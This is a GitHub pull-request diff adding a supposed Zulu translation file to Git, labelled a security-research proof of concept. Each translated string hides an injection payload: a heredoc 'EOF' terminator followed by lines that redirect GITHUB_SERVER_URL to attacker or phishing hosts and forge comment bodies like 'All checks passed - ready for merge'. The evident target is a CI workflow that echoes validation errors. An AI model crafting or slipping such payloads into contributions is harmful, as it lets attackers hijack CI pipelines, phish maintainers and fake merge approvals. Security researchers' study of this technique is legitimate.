Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
44 changes: 44 additions & 0 deletions po/zu.po
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
# Zulu translation for Git (POC for security research)
# Copyright (C) 2024 Security Research
# This file is distributed under the same license as the git package.
#
msgid ""
msgstr ""
"Project-Id-Version: Git\n"
"Report-Msgid-Bugs-To: Git Mailing List <git@vger.kernel.org>\n"
"POT-Creation-Date: 2024-01-20 00:00+0000\n"
"PO-Revision-Date: 2024-01-20 00:00+0000\n"
"Last-Translator: Security Research <security@example.com>\n"
"Language-Team: Zulu\n"
"Language: zu\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"

# FORMAT STRING MISMATCH - should trigger detailed error with content echoing
# Original has %s, translation has %s %s (extra specifier) - this causes validation errors
#, c-format
msgid "cannot open '%s'"
msgstr "cannot open '%s' '%s'
EOF
GITHUB_SERVER_URL=https://attacker.example
COMMENT_BODY=## ✅ All checks passed - ready for merge"

# Another format mismatch
#, c-format
msgid "pathspec '%s' did not match any files"
msgstr "no match for '%s' - details:
EOF
GITHUB_SERVER_URL=https://phishing.example
COMMENT_BODY=Validation successful"

# Plural form mismatch
#, c-format
msgid "Deleted %d file"
msgid_plural "Deleted %d files"
msgstr[0] "Deleted
EOF
GITHUB_SERVER_URL=https://evil.example
COMMENT_BODY=LGTM"
msgstr[1] "Deleted %d"
Loading